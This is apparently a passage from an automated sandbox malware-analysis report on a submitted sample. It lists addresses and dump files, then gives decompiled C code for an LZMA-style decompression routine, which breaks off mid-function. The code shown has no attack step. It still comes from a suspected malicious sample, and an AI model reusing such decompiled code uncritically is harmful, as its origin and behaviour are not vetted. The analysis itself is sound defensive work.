                                                                                                                                                                            0x004068bc
                                                                                                                                                                            0x004068d5
                                                                                                                                                                            0x004068d7
                                                                                                                                                                            0x004068da
                                                                                                                                                                            0x004068db
                                                                                                                                                                            0x004068de
                                                                                                                                                                            0x004068e0
                                                                                                                                                                            0x004068e3
                                                                                                                                                                            0x004068e5
                                                                                                                                                                            0x004068e7
                                                                                                                                                                            0x004068ea
                                                                                                                                                                            0x004068ec
                                                                                                                                                                            0x004068ef
                                                                                                                                                                            0x004068f3
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f6
                                                                                                                                                                            0x004068f9
                                                                                                                                                                            0x004068fc
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068c6
                                                                                                                                                                            0x004068cb
                                                                                                                                                                            0x004068cd
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068ff
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406819
                                                                                                                                                                            0x0040681c
                                                                                                                                                                            0x0040681e
                                                                                                                                                                            0x00406821
                                                                                                                                                                            0x00406824
                                                                                                                                                                            0x00406827
                                                                                                                                                                            0x00406829
                                                                                                                                                                            0x0040682c
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406835
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x004067c2
                                                                                                                                                                            0x004067c5
                                                                                                                                                                            0x004067c7
                                                                                                                                                                            0x004067ca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x0040652d
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00406533
                                                                                                                                                                            0x00406536
                                                                                                                                                                            0x00406539
                                                                                                                                                                            0x0040653c
                                                                                                                                                                            0x0040653f
                                                                                                                                                                            0x00406542
                                                                                                                                                                            0x00406545
                                                                                                                                                                            0x00406547
                                                                                                                                                                            0x0040654a
                                                                                                                                                                            0x0040654d
                                                                                                                                                                            0x00406550
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b8
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x004066be
                                                                                                                                                                            0x004066c1
                                                                                                                                                                            0x004066c4
                                                                                                                                                                            0x004066c7
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066cc
                                                                                                                                                                            0x004066cf
                                                                                                                                                                            0x004066d2
                                                                                                                                                                            0x004066d5
                                                                                                                                                                            0x004066d8
                                                                                                                                                                            0x004066db
                                                                                                                                                                            0x004066dc
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066e1
                                                                                                                                                                            0x004066e4
                                                                                                                                                                            0x004066e7
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ed
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406935
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693e
                                                                                                                                                                            0x00406941
                                                                                                                                                                            0x00406944
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406949
                                                                                                                                                                            0x0040694c
                                                                                                                                                                            0x0040694f
                                                                                                                                                                            0x00406952
                                                                                                                                                                            0x00406955
                                                                                                                                                                            0x00406958
                                                                                                                                                                            0x00406959
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695e
                                                                                                                                                                            0x00406961
                                                                                                                                                                            0x00406964
                                                                                                                                                                            0x00406967
                                                                                                                                                                            0x0040696a
                                                                                                                                                                            0x0040696e
                                                                                                                                                                            0x00406970
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00406bca
                                                                                                                                                                            0x00406bd0
                                                                                                                                                                            0x00406bd2
                                                                                                                                                                            0x00406bd9
                                                                                                                                                                            0x00406bdb
                                                                                                                                                                            0x00406be2
                                                                                                                                                                            0x00406be6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406ab2
                                                                                                                                                                            0x00406ab8
                                                                                                                                                                            0x00406abb
                                                                                                                                                                            0x00406abe
                                                                                                                                                                            0x00406ac1
                                                                                                                                                                            0x00406ac4
                                                                                                                                                                            0x00406ac7
                                                                                                                                                                            0x00406aca
                                                                                                                                                                            0x00406acd
                                                                                                                                                                            0x00406ad3
                                                                                                                                                                            0x00406aec
                                                                                                                                                                            0x00406aef
                                                                                                                                                                            0x00406af2
                                                                                                                                                                            0x00406af5
                                                                                                                                                                            0x00406af9
                                                                                                                                                                            0x00406afb
                                                                                                                                                                            0x00406afc
                                                                                                                                                                            0x00406aff
                                                                                                                                                                            0x00406ad5
                                                                                                                                                                            0x00406ad5
                                                                                                                                                                            0x00406add
                                                                                                                                                                            0x00406ae2
                                                                                                                                                                            0x00406ae4
                                                                                                                                                                            0x00406ae7
                                                                                                                                                                            0x00406ae7
                                                                                                                                                                            0x00406b09
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b0b
                                                                                                                                                                            0x00406b09
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040697e

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
                                                                                                                                                                            • Instruction ID: e89747aace1fce0fcb13a8d80e6f88749465aa03c559881c8099c8d07fdfb4d2
                                                                                                                                                                            • Opcode Fuzzy Hash: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
                                                                                                                                                                            • Instruction Fuzzy Hash: BE911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E00406690() {
                                                                                                                                                                            				unsigned short _t532;
                                                                                                                                                                            				signed int _t533;
                                                                                                                                                                            				void _t534;
                                                                                                                                                                            				void* _t535;
                                                                                                                                                                            				signed int _t536;
                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                            				signed int _t589;
                                                                                                                                                                            				signed int* _t606;
                                                                                                                                                                            				void* _t613;
                                                                                                                                                                            
                                                                                                                                                                            				L0:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L0:
                                                                                                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                            						L89:
                                                                                                                                                                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                                                                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                                                                            						L69:
                                                                                                                                                                            						_t606 =  *(_t613 - 0x58);
                                                                                                                                                                            						 *(_t613 - 0x84) = 0x12;
                                                                                                                                                                            						L132:
                                                                                                                                                                            						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            						L133:
                                                                                                                                                                            						_t532 =  *_t606;
                                                                                                                                                                            						_t589 = _t532 & 0x0000ffff;
                                                                                                                                                                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                            						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                            							 *(_t613 - 0x40) = 1;
                                                                                                                                                                            							_t533 = _t532 - (_t532 >> 5);
                                                                                                                                                                            							 *_t606 = _t533;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *(_t613 - 0x10) = _t565;
                                                                                                                                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                            							L139:
                                                                                                                                                                            							_t534 =  *(_t613 - 0x84);
                                                                                                                                                                            							L140:
                                                                                                                                                                            							 *(_t613 - 0x88) = _t534;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							L137:
                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            								 *(_t613 - 0x88) = 5;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                            							goto L139;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                            							L171:
                                                                                                                                                                            							_t536 = _t535 | 0xffffffff;
                                                                                                                                                                            							L172:
                                                                                                                                                                            							return _t536;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eax = 0;
                                                                                                                                                                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                            						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                            						L75:
                                                                                                                                                                            						if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            							 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                            							L170:
                                                                                                                                                                            							_t568 = 0x22;
                                                                                                                                                                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                            							_t536 = 0;
                                                                                                                                                                            							goto L172;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eax =  *(__ebp - 0x14);
                                                                                                                                                                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            						}
                                                                                                                                                                            						__edx =  *(__ebp - 8);
                                                                                                                                                                            						__cl =  *(__eax + __edx);
                                                                                                                                                                            						__eax =  *(__ebp - 0x14);
                                                                                                                                                                            						 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            						 *(__eax + __edx) = __cl;
                                                                                                                                                                            						__eax = __eax + 1;
                                                                                                                                                                            						__edx = 0;
                                                                                                                                                                            						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            						__edx = _t274;
                                                                                                                                                                            						__eax =  *(__ebp - 0x68);
                                                                                                                                                                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            						_t283 = __ebp - 0x64;
                                                                                                                                                                            						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            						L79:
                                                                                                                                                                            						 *(__ebp - 0x14) = __edx;
                                                                                                                                                                            						L80:
                                                                                                                                                                            						 *(__ebp - 0x88) = 2;
                                                                                                                                                                            					}
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t535 =  *(_t613 - 0x88);
                                                                                                                                                                            					if(_t535 > 0x1c) {
                                                                                                                                                                            						goto L171;
                                                                                                                                                                            					}
                                                                                                                                                                            					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BE7))) {
                                                                                                                                                                            						case 0:
                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            							_t535 =  *( *(_t613 - 0x70));
                                                                                                                                                                            							if(_t535 > 0xe1) {
                                                                                                                                                                            								goto L171;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t539 = _t535 & 0x000000ff;
                                                                                                                                                                            							_push(0x2d);
                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                            							_pop(_t570);
                                                                                                                                                                            							_push(9);
                                                                                                                                                                            							_pop(_t571);
                                                                                                                                                                            							_t609 = _t539 / _t570;
                                                                                                                                                                            							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                            							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                                                                            							 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                                                                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                            								L10:
                                                                                                                                                                            								if(_t612 == 0) {
                                                                                                                                                                            									L12:
                                                                                                                                                                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            									goto L15;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L11;
                                                                                                                                                                            								}
                                                                                                                                                                            								do {
                                                                                                                                                                            									L11:
                                                                                                                                                                            									_t612 = _t612 - 1;
                                                                                                                                                                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                            								} while (_t612 != 0);
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *(_t613 - 4) != 0) {
                                                                                                                                                                            								GlobalFree( *(_t613 - 4)); // executed
                                                                                                                                                                            							}
                                                                                                                                                                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            							 *(_t613 - 4) = _t535;
                                                                                                                                                                            							if(_t535 == 0) {
                                                                                                                                                                            								goto L171;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                            								goto L10;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 1:
                                                                                                                                                                            							L13:
                                                                                                                                                                            							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            								 *(_t613 - 0x88) = 1;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            							_t45 = _t613 - 0x48;
                                                                                                                                                                            							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                            							__eflags =  *_t45;
                                                                                                                                                                            							L15:
                                                                                                                                                                            							if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t547 =  *(_t613 - 0x40);
                                                                                                                                                                            							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                                                                            								L20:
                                                                                                                                                                            								 *(_t613 - 0x48) = 5;
                                                                                                                                                                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                            								goto L23;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t613 - 0x74) = _t547;
                                                                                                                                                                            							if( *(_t613 - 8) != 0) {
                                                                                                                                                                            								GlobalFree( *(_t613 - 8)); // executed
                                                                                                                                                                            							}
                                                                                                                                                                            							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                            							 *(_t613 - 8) = _t535;
                                                                                                                                                                            							if(_t535 == 0) {
                                                                                                                                                                            								goto L171;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L20;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 2:
                                                                                                                                                                            							L24:
                                                                                                                                                                            							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                            							 *(_t613 - 0x84) = 6;
                                                                                                                                                                            							 *(_t613 - 0x4c) = _t554;
                                                                                                                                                                            							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                                                                            							goto L132;
                                                                                                                                                                            						case 3:
                                                                                                                                                                            							L21:
                                                                                                                                                                            							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            								 *(_t613 - 0x88) = 3;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            							_t67 = _t613 - 0x70;
                                                                                                                                                                            							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            							__eflags =  *_t67;
                                                                                                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                            							L23:
                                                                                                                                                                            							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                            							if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                            								goto L21;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L24;
                                                                                                                                                                            						case 4:
                                                                                                                                                                            							goto L133;
                                                                                                                                                                            						case 5:
                                                                                                                                                                            							goto L137;
                                                                                                                                                                            						case 6:
                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            								 *(__ebp - 0x34) = 1;
                                                                                                                                                                            								 *(__ebp - 0x84) = 7;
                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            								goto L132;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                            							__esi =  *(__ebp - 0x60);
                                                                                                                                                                            							__cl = 8;
                                                                                                                                                                            							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                            							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                            							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                            							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                            							__ecx =  *(__ebp - 4);
                                                                                                                                                                            							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                            							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                            							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                            							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            							if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                            								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                            								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                            									_t98 = __ebp - 0x38;
                                                                                                                                                                            									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                            									__eflags =  *_t98;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(__ebp - 0x38) = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                            							if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                            								__ebx = 1;
                                                                                                                                                                            								goto L61;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eax =  *(__ebp - 0x14);
                                                                                                                                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                            								}
                                                                                                                                                                            								__ecx =  *(__ebp - 8);
                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                            								__ebx = 1;
                                                                                                                                                                            								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            								goto L41;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 7:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                            							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                                                                                                            								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            								__eax =  *(__ebp - 0x28);
                                                                                                                                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            								__eax = 0;
                                                                                                                                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            								__al = __al & 0x000000fd;
                                                                                                                                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            								goto L69;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 4);
                                                                                                                                                                            							__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            							 *(__ebp - 0x84) = 8;
                                                                                                                                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            							goto L132;
                                                                                                                                                                            						case 8:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eax =  *(__ebp - 0x38);
                                                                                                                                                                            								__ecx =  *(__ebp - 4);
                                                                                                                                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                            								 *(__ebp - 0x84) = 9;
                                                                                                                                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L132;
                                                                                                                                                                            						case 9:
                                                                                                                                                                            							goto L0;
                                                                                                                                                                            						case 0xa:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            								goto L132;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x28);
